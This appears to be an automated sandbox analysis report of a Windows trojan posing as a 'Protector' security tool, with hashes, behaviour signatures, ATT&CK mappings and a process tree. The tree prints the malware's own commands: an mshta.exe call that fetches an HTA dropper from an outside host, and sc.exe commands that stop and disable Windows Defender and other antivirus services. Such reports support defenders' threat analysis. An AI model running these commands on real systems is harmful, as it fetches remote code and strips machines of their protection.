Overview

overview

10

Static

static

3

a178083977...e7.exe

windows7-x64

7

a178083977...e7.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-02-2024 09:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a178083977255560a5e3b886e4f79ce7.exe

  • Size

    2.0MB

  • MD5

    a178083977255560a5e3b886e4f79ce7

  • SHA1

    9c59fec6a7d2559db0566ef5adc93740dcc67bad

  • SHA256

    9da45c1414fde84e01fbe21e66ab691b1201aaa24c72f8575f5dec3f0fbd23b8

  • SHA512

    1136f7e5bd5f062fe1249db4d8bddab33f848bb3c901bcde1cdf33f0f7761f104156e5799c64b4e65cf2235d404b1114a246faac5a811b992b222387f80942af

  • SSDEEP

    49152:Dtq2uoGFcKkmE7BRCp4u3e3S5y1Shi35U0thsf:Dduo4cKkmISZe371SgJB4

Score
10/10
evasionpersistencetrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://galaint.coolsecupdate.info/?0=154&1=1&2=1&3=38&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=yvcpifbvek&14=1

Signatures

  • UAC bypass 3 TTPs 3 IoCs
    evasiontrojan
  • Disables taskbar notifications via registry modification
    evasion
  • Sets file execution options in registry 2 TTPs 64 IoCs
    persistence
  • Stops running service(s) 3 TTPs
    evasion
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Drops file in System32 directory 3 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • System policy modification 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\a178083977255560a5e3b886e4f79ce7.exe
    "C:\Users\Admin\AppData\Local\Temp\a178083977255560a5e3b886e4f79ce7.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3548
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\o4ib9o461wv8827.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\o4ib9o461wv8827.exe" -e -p7yit6hq0c534ln6
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4848
      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\4epu7913jyq24zg.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\4epu7913jyq24zg.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2088
        • C:\Users\Admin\AppData\Roaming\Protector-pffo.exe
          C:\Users\Admin\AppData\Roaming\Protector-pffo.exe
          4⤵
          • UAC bypass
          • Sets file execution options in registry
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Drops file in System32 directory
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:1116
          • C:\Windows\SysWOW64\mshta.exe
            mshta.exe "http://galaint.coolsecupdate.info/?0=154&1=1&2=1&3=38&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=yvcpifbvek&14=1"
            5⤵
              PID:1284
            • C:\Windows\SysWOW64\sc.exe
              sc stop WinDefend
              5⤵
              • Launches sc.exe
              PID:4144
            • C:\Windows\SysWOW64\sc.exe
              sc stop msmpsvc
              5⤵
              • Launches sc.exe
              PID:4092
            • C:\Windows\SysWOW64\sc.exe
              sc config WinDefend start= disabled
              5⤵
              • Launches sc.exe
              PID:2800
            • C:\Windows\SysWOW64\sc.exe
              sc config msmpsvc start= disabled
              5⤵
              • Launches sc.exe
              PID:3936
            • C:\Windows\SysWOW64\sc.exe
              sc config ekrn start= disabled
              5⤵
              • Launches sc.exe
              PID:1632
            • C:\Windows\SysWOW64\sc.exe
              sc config AntiVirSchedulerService start= disabled
              5⤵
              • Launches sc.exe
              PID:4648
            • C:\Windows\SysWOW64\sc.exe
              sc config AntiVirService start= disabled
              5⤵
              • Launches sc.exe
              PID:724
            • C:\Windows\SysWOW64\sc.exe
              sc stop AntiVirService
              5⤵
              • Launches sc.exe
              PID:4724
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\4EPU79~1.EXE" >> NUL
            4⤵
              PID:2456

      Network

      MITRE ATT&CK Enterprise v15

      Reconnaissance

      Resource Development

      Initial Access

      Execution

      Persistence

      Boot or Logon Autostart Execution

      2
      T1547

      Registry Run Keys / Startup Folder

      2
      T1547.001

      Create or Modify System Process

      1
      T1543

      Windows Service

      1
      T1543.003

      Privilege Escalation

      Abuse Elevation Control Mechanism

      1
      T1548

      Bypass User Account Control

      1
      T1548.002

      Boot or Logon Autostart Execution

      2
      T1547

      Registry Run Keys / Startup Folder

      2
      T1547.001

      Create or Modify System Process

      1
      T1543

      Windows Service

      1
      T1543.003

      Defense Evasion

      Abuse Elevation Control Mechanism

      1
      T1548

      Bypass User Account Control

      1
      T1548.002

      Impair Defenses

      2
      T1562

      Disable or Modify Tools

      1
      T1562.001

      Modify Registry

      5
      T1112

      Credential Access

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      3
      T1082

      Lateral Movement

      Collection

      Command and Control

      Exfiltration

      Impact

      Service Stop

      1
      T1489

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\o4ib9o461wv8827.exe
        Filesize

        2.0MB

        MD5

        8c03b4dc54244014229009d42e7c0455

        SHA1

        8df39a19d4601daf554143815b6afa3286904a7d

        SHA256

        012a675100f650f93436b0c226652b335db207b9ba04331d9d0513c975bb9010

        SHA512

        bbd9573f14411dd23689e103e2ba75bfc89b481e540450ba47fd1550b088177efedd5918713ebab9776b89a57a82f28ba9784785fcc22fc86e180aeb70724d08

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\4epu7913jyq24zg.exe
        Filesize

        1.9MB

        MD5

        bfd99e635288e5e0f46f0e7aa150300c

        SHA1

        17b31bc6d8a5ca2c065fbaf3e1c755cf68ffd37b

        SHA256

        969006837a0889f09181454819b7a27d89ca11330b628d3faf56a3e46022fd01

        SHA512

        c806add828107536f463d3103be1907ddbe653a25fbf0e785dc69c2e9a52b76927a2d3efa6d509b85b97fa9710a3156273ee5c914f3365c5e854c6073da704cc

        Download Submit

      • memory/1116-205-0x0000000000400000-0x00000000007F1000-memory.dmp

        Filesize

        3.9MB

        Download

      • memory/1116-239-0x0000000000400000-0x00000000007F1000-memory.dmp

        Filesize

        3.9MB

        Download

      • memory/1116-240-0x0000000000400000-0x00000000007F1000-memory.dmp

        Filesize

        3.9MB

        Download

      • memory/1116-241-0x0000000000400000-0x00000000007F1000-memory.dmp

        Filesize

        3.9MB

        Download

      • memory/1116-242-0x0000000000400000-0x00000000007F1000-memory.dmp

        Filesize

        3.9MB

        Download

      • memory/1116-251-0x0000000000400000-0x00000000007F1000-memory.dmp

        Filesize

        3.9MB

        Download

      • memory/1116-247-0x0000000000400000-0x00000000007F1000-memory.dmp

        Filesize

        3.9MB

        Download

      • memory/1116-246-0x0000000000400000-0x00000000007F1000-memory.dmp

        Filesize

        3.9MB

        Download

      • memory/1116-245-0x0000000000400000-0x00000000007F1000-memory.dmp

        Filesize

        3.9MB

        Download

      • memory/1116-244-0x0000000000400000-0x00000000007F1000-memory.dmp

        Filesize

        3.9MB

        Download

      • memory/2088-57-0x0000000003860000-0x0000000003861000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-64-0x00000000038E0000-0x00000000038E1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-24-0x00000000027D0000-0x00000000027D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-26-0x0000000003630000-0x0000000003631000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-27-0x0000000003620000-0x0000000003622000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2088-28-0x0000000003890000-0x0000000003891000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-29-0x0000000003670000-0x0000000003671000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-33-0x0000000003680000-0x0000000003681000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-31-0x0000000003610000-0x0000000003613000-memory.dmp

        Filesize

        12KB

        Download

      • memory/2088-37-0x00000000008E0000-0x00000000008E1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-39-0x0000000003640000-0x0000000003641000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-36-0x00000000008D0000-0x00000000008D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-40-0x0000000002830000-0x0000000002831000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-42-0x0000000002670000-0x0000000002671000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-43-0x00000000029A0000-0x00000000029A1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-45-0x00000000028F0000-0x00000000028F1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-47-0x0000000003690000-0x0000000003691000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-48-0x0000000002A50000-0x0000000002A51000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-49-0x00000000036B0000-0x00000000036B1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-50-0x00000000036A0000-0x00000000036A1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-51-0x00000000036C0000-0x00000000036C1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-52-0x00000000036F0000-0x00000000036F1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-54-0x0000000003850000-0x0000000003851000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-53-0x00000000036E0000-0x00000000036E1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-56-0x0000000003870000-0x0000000003871000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-55-0x0000000003840000-0x0000000003841000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-23-0x0000000002800000-0x0000000002801000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-58-0x0000000003880000-0x0000000003881000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-59-0x00000000038B0000-0x00000000038B1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-60-0x00000000038A0000-0x00000000038A1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-61-0x00000000038D0000-0x00000000038D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-62-0x00000000038C0000-0x00000000038C1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-63-0x00000000038F0000-0x00000000038F1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-25-0x0000000002820000-0x0000000002821000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-66-0x0000000003900000-0x0000000003901000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-65-0x0000000003910000-0x0000000003911000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-67-0x0000000003930000-0x0000000003931000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-68-0x0000000003920000-0x0000000003921000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-70-0x0000000003950000-0x0000000003951000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-69-0x0000000003960000-0x0000000003961000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-71-0x0000000003CC0000-0x0000000003CC1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-72-0x0000000003CB0000-0x0000000003CB1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-73-0x0000000003E00000-0x0000000003E01000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-75-0x0000000003E20000-0x0000000003E21000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-74-0x0000000003E30000-0x0000000003E31000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-76-0x0000000003E60000-0x0000000003E61000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-77-0x0000000003E50000-0x0000000003E51000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-79-0x0000000003E40000-0x0000000003E41000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-81-0x0000000004370000-0x0000000004371000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-80-0x0000000004340000-0x0000000004341000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-78-0x0000000003E70000-0x0000000003E71000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-82-0x00000000043A0000-0x00000000043A1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-83-0x0000000004390000-0x0000000004391000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-84-0x00000000036D0000-0x00000000036D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-85-0x0000000004350000-0x0000000004351000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-22-0x0000000002680000-0x0000000002681000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-21-0x0000000002690000-0x0000000002691000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-20-0x00000000026A0000-0x00000000026A1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-19-0x00000000025E0000-0x000000000263A000-memory.dmp

        Filesize

        360KB

        Download

      • memory/2088-18-0x0000000000400000-0x00000000007F1000-memory.dmp

        Filesize

        3.9MB

        Download

      • memory/2088-86-0x0000000004380000-0x0000000004381000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-87-0x00000000064C0000-0x00000000064C1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-88-0x00000000064B0000-0x00000000064B1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-89-0x00000000064D0000-0x00000000064D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-117-0x0000000000400000-0x00000000007F1000-memory.dmp

        Filesize

        3.9MB

        Download